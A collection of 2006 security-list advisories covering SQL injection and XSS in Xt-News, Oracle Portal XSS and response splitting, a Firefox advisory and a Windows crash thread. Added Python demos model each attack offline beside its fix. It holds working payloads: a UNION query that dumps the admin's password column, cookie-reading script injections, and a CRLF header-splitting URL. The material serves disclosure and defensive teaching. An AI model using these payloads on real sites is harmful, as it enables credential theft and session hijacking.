Xt-News 0.1 : SQL Injection / XSS Vulnerabilities
Xt-News 0.1
---
Vendor site: http://dreaxteam.free.fr/forums/
Product: Xt-News 0.1
Vulnerability: SQL Injection, Cross Site Scripting
Credits: Mr_KaLiMaN
Reported to Vendor: 10/12/06
Public disclosure: 22/12/06

Description:

SQL Injection:
http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION]
http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1#

The id_news parameter is placed unquoted in the query. The UNION supplies as many columns as the news query selects (eleven here) and pulls the user and mdp (presumably the password, mot de passe) columns of the admin account into the page; the trailing # is a MySQL comment that discards the rest of the original query.

XSS:
http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS]
http://[victim]/[script_news_path]/add_comment.php?id_news=;<script>alert(document.cookie)</script>foo
http://[victim]/[script_news_path]/show_news.php?id_news=[XSS]
http://[victim]/[script_news_path]/show_news.php?id_news='<script>alert(document.cookie)</script>foo '
---
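The injection above, modelled in sqlite3 so it can be run offline. This is an added example, not Xt-News code: the real schema is not on the page, so the tables, the eleven placeholder news columns and the sample rows are constructed from the names the payload reveals (xtnews_users, id, user, mdp, admin), and mdp is assumed to be the password field. The MySQL # comment is swapped for the `-- ` comment that sqlite understands; the attack is otherwise the advisory's.

```python
import sqlite3

# Constructed schema (assumption: Xt-News 0.1's real schema is not on the page).
# The payload's UNION has 11 columns, so the news table gets 11 columns.
SCHEMA = """
CREATE TABLE xtnews_users (id INTEGER, user TEXT, mdp TEXT, admin INTEGER);
CREATE TABLE xtnews_news (
    id INTEGER, titre TEXT, c3 TEXT, c4 TEXT, texte TEXT, c6 TEXT,
    c7 TEXT, c8 TEXT, c9 TEXT, c10 TEXT, c11 TEXT
);
INSERT INTO xtnews_users VALUES (1, 'admin', 'ADMIN_PASSWORD_HASH', 1);
INSERT INTO xtnews_users VALUES (2, 'bob',   'BOB_PASSWORD_HASH',   0);
INSERT INTO xtnews_news  VALUES (1, 'First post', '', '', 'Hello world',
                                 '', '', '', '', '', '');
"""

# The advisory's payload; '#' (MySQL comment) replaced by sqlite's '-- '.
PAYLOAD = ("-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null "
           "FROM xtnews_users WHERE admin=1 -- ")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def show_news_vulnerable(conn: sqlite3.Connection, id_news: str) -> list:
    """Concatenates the request parameter into the SQL, as the advisory implies
    show_news.php does. id=-1 matches no news row, so every row returned is
    produced by the attacker's UNION SELECT over xtnews_users."""
    sql = "SELECT * FROM xtnews_news WHERE id=" + id_news
    return conn.execute(sql).fetchall()


def show_news_fixed(conn: sqlite3.Connection, id_news: str) -> list:
    """Bound parameter: the value is only ever compared against id and can never
    change the query's structure. The UNION text equals no integer id."""
    return conn.execute("SELECT * FROM xtnews_news WHERE id=?", (id_news,)).fetchall()


def leaked_credentials(rows: list) -> list:
    """Map UNION rows back to (user, mdp): the payload puts 'user' in the 2nd
    column slot and 'mdp' in the 5th slot of the news row layout."""
    return [(row[1], row[4]) for row in rows]


if __name__ == "__main__":
    db = make_db()
    print(leaked_credentials(show_news_vulnerable(db, PAYLOAD)))  # [('admin', 'ADMIN_PASSWORD_HASH')]
    print(show_news_fixed(db, PAYLOAD))                           # []
```

Column-count and column-type agreement is what makes the UNION work: the nulls pad the attacker's row to the news query's width, which is why a real injection is usually preceded by probing with ORDER BY n or a growing list of nulls until the error disappears.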
Re: Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
Well, just a warning before running the proof of concept... Make sure to close and save useful stuff. It indeed works on XP SP2 and it will reboot your machine. I have to say, this would be a trick to exploit another program's messagebox, and what joy could you possibly get out of restarting someone's computer? I don't think there is a possibility for any code execution, as far as I've seen. Would be a nice S-Kiddy toy if you could do it remotely, but would also piss off a lot of people.
RE: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
> Holy mackerel! Instances of this bug date back to 1999!

Different bug. That appears to be a trivial exhaustion of CSRSS worker threads through indiscriminate calls to MessageBox+MB_SERVICE_NOTIFICATION, which causes a DoS as no threads are available to serve kernel-mode requests from win32k, stalling GUI processes. I have done my fair share of CSRSS reversing in my better days, and I'm pretty sure that in Windows 2000 and later, a dedicated thread is used for such notifications, not just any thread, any time. Easily verifiable with local net sends and Spy++. It wasn't a bug either, more like a serious design flaw that ignored a very basic Win32 mantra (don't do GUI in a worker thread) - not at all like this double-free.
rPSA-2006-0234-1 firefox
rPath Security Advisory: 2006-0234-1
Published: 2006-12-22
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
firefox=/[EMAIL PROTECTED]:devel//1/1.5.0.9-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6497
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6498
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6501
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6502
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6503
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6504
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6505
https://issues.rpath.com/browse/RPL-883

Description:
Previous versions of the firefox package are vulnerable to multiple types of attacks, including one that enables an attacker to run arbitrary attacker-provided executable code if JavaScript is enabled.
Oracle Applications/Portal 9i/10g Cross Site Scripting
Description
---
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in Oracle Portal. The following is one that you may find in any version:

http://target/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');//

The following code will be generated:

---SNIPPED---
<script language=javascript>
top.null = null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now', 'null');//.render(window);
</script>
---SNIPPED---

The tc parameter is written straight into a JavaScript identifier position (top.<tc>.render(window);), so the payload needs no angle brackets or quotes: a semicolon ends the intended statement and the trailing // comments out the rest of the line.

Solution
---
There is no solution. As a workaround, enable mod_security if it is not already enabled. Otherwise wait 6 months/1 year for a patch from Oracle Corp.
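Both reflected XSS findings on this page, the Xt-News id_news echo (HTML body context) and the Oracle Portal tc parameter (JavaScript identifier context), side by side, as an added example that is not code from either vendor. The two templates are constructed guesses at what the scripts emit, since the PHP and JSP sources are not on the page; the payloads are the advisories' own. The point it makes is that the fix differs by context: HTML escaping neutralises the Xt-News payload but does nothing against the Oracle one, which contains no character that HTML escaping touches in a way that matters.

```python
import html
import re

# Payloads from the two advisories.
XTNEWS_PAYLOAD = ";<script>alert(document.cookie)</script>foo"
ORACLE_PAYLOAD = ("null = null;alert('Hello!');"
                  "window.open('http://www.oracle.com/?fix_security_bugs_now', 'null');//")

# Assumed output of add_comment.php: id_news echoed into the page body.
def xtnews_add_comment_vulnerable(id_news: str) -> str:
    return f"<p>Comment on news {id_news}</p>"

def xtnews_add_comment_fixed(id_news: str) -> str:
    # HTML body context: entity-encode <, >, &, quotes. Sufficient here.
    return f"<p>Comment on news {html.escape(id_news, quote=True)}</p>"

# Assumed template behind container_tabs.jsp, matching the generated code shown
# in the advisory: the parameter lands in an identifier slot inside a script.
ORACLE_TEMPLATE = "<script language=javascript>\ntop.{tc}.render(window);\n</script>"

def oracle_container_tabs_vulnerable(tc: str) -> str:
    return ORACLE_TEMPLATE.format(tc=tc)

def oracle_container_tabs_escaped_only(tc: str) -> str:
    # Wrong fix: the payload has no '<' and only single quotes, so escaping
    # leaves the statement separators and the comment marker intact.
    return ORACLE_TEMPLATE.format(tc=html.escape(tc, quote=True))

JS_IDENT = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*")

def is_plain_identifier(tc: str) -> bool:
    return JS_IDENT.fullmatch(tc) is not None

def oracle_container_tabs_fixed(tc: str) -> str:
    # Right fix for a JS identifier slot: allowlist the shape, refuse the rest.
    if not is_plain_identifier(tc):
        raise ValueError("tc must be a bare JavaScript identifier")
    return ORACLE_TEMPLATE.format(tc=tc)

SCRIPT_BODY = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)

def script_bodies(page: str) -> list:
    """Contents of every <script> element a browser would execute."""
    return SCRIPT_BODY.findall(page)

def injected(page: str) -> bool:
    """Crude oracle for this demo: does any executed script contain the
    payloads' alert( call? Legitimate pages here never do."""
    return any("alert(" in body for body in script_bodies(page))


if __name__ == "__main__":
    print(injected(xtnews_add_comment_vulnerable(XTNEWS_PAYLOAD)))      # True
    print(injected(xtnews_add_comment_fixed(XTNEWS_PAYLOAD)))           # False
    print(injected(oracle_container_tabs_vulnerable(ORACLE_PAYLOAD)))   # True
    print(injected(oracle_container_tabs_escaped_only(ORACLE_PAYLOAD))) # True
    print(is_plain_identifier(ORACLE_PAYLOAD))                          # False
```

The mod_security workaround the advisory suggests is a filter on exactly this kind of request pattern (a semicolon or // inside a parameter that should be an identifier), which is why it is a workaround rather than a fix: the sink still accepts anything that slips past the filter.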
Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
> From: Brian Eaton [EMAIL PROTECTED]
> To: putosoft softputo [EMAIL PROTECTED]
> CC: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
> Date: Wed, 20 Dec 2006 13:55:09 -0500
>
> On 12/20/06, putosoft softputo [EMAIL PROTECTED] wrote:
> > Oracle Portal/Applications HTTP Response Splitting
> > --
> > Sample:
> > http://target/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E
>
> So they let the URL specify the content-encoding? They might be vulnerable to XSS via UTF-7 as well.
>
> Regards,
> Brian

Yeah, it is.
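The two failure modes discussed in this thread, modelled as an added example that is not Oracle's code: a constructed response builder that copies the enc= parameter into the Content-Type charset the way calendar.jsp evidently does, a naive client-side parser that splits headers from body at the first blank line, and a decoder that honours the advertised charset the way a browser would. The CRLF payload is the advisory's; the UTF-7 body is constructed to show the follow-up's point that an attacker-chosen charset turns an HTML-escaped string into markup.

```python
import html
from urllib.parse import unquote

# The advisory's sample, URL-decoded: charset value followed by CR LF, a fake
# header, a blank line and a script body.
SPLIT_PAYLOAD = unquote(
    "iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E")

BODY = "<html><body>calendar</body></html>"

# Constructed "user comment" that survives HTML escaping untouched (no < > & ")
# but decodes to <script>alert(1)</script> under UTF-7.
UTF7_COMMENT = "+ADw-script+AD4-alert(1)+ADw-/script+AD4-"
UTF7_BODY = BODY.replace("calendar", html.escape(UTF7_COMMENT, quote=True))


def calendar_response_vulnerable(enc: str, body: str = BODY) -> bytes:
    """enc copied verbatim into a header, as the sample URL demonstrates."""
    headers = [
        "HTTP/1.1 200 OK",
        "Content-Type: text/html; charset=" + enc,
        "Content-Length: " + str(len(body)),
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode("latin-1")


ALLOWED_CHARSETS = {"utf-8", "iso-8859-1"}

def calendar_response_fixed(enc: str, body: str = BODY) -> bytes:
    """Allowlist the charset. This rejects CR/LF (no allowed value contains
    them) and exotic encodings such as utf-7 in one check."""
    if enc.lower() not in ALLOWED_CHARSETS:
        enc = "utf-8"
    return calendar_response_vulnerable(enc, body)


def parse_response(raw: bytes) -> tuple:
    """Naive client: status line, then headers up to the first blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def charset_of(headers: dict) -> str:
    for part in headers.get("content-type", "").split(";"):
        part = part.strip()
        if part.lower().startswith("charset="):
            return part[len("charset="):].strip().lower()
    return "iso-8859-1"


def render_as_browser(raw: bytes) -> str:
    """Decode the body with the charset the headers advertise."""
    _, headers, body = parse_response(raw)
    return body.decode(charset_of(headers), errors="replace")


if __name__ == "__main__":
    # CRLF: the injected script becomes the body the client sees.
    print(render_as_browser(calendar_response_vulnerable(SPLIT_PAYLOAD))[:28])  # <script>alert('hi')</script>
    print(render_as_browser(calendar_response_fixed(SPLIT_PAYLOAD)) == BODY)     # True
    # UTF-7: escaped text is re-read as markup once the charset is attacker-chosen.
    print(render_as_browser(calendar_response_vulnerable("utf-7", UTF7_BODY)))   # ...<script>alert(1)</script>...
    print(render_as_browser(calendar_response_fixed("utf-7", UTF7_BODY)) == UTF7_BODY)  # True
```

Modern servlet containers and web frameworks refuse CR and LF in header values outright, which closes the splitting half; the charset half is only closed by not letting the request choose the encoding at all, or by allowlisting it as above.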
SQID v0.2 - SQL Injection Digger.
SQL injection digger is a command line program that looks for SQL injections and common errors in websites. The current version looks for SQL injections and common errors in website URLs found by performing a Google search. Use of the Google search SOAP API has been removed, since Google no longer issues keys; the tool now performs the search directly over the web. Sqid can be downloaded from http://sqid.rubyforge.org.

-- MSG // http://www.metaeye.org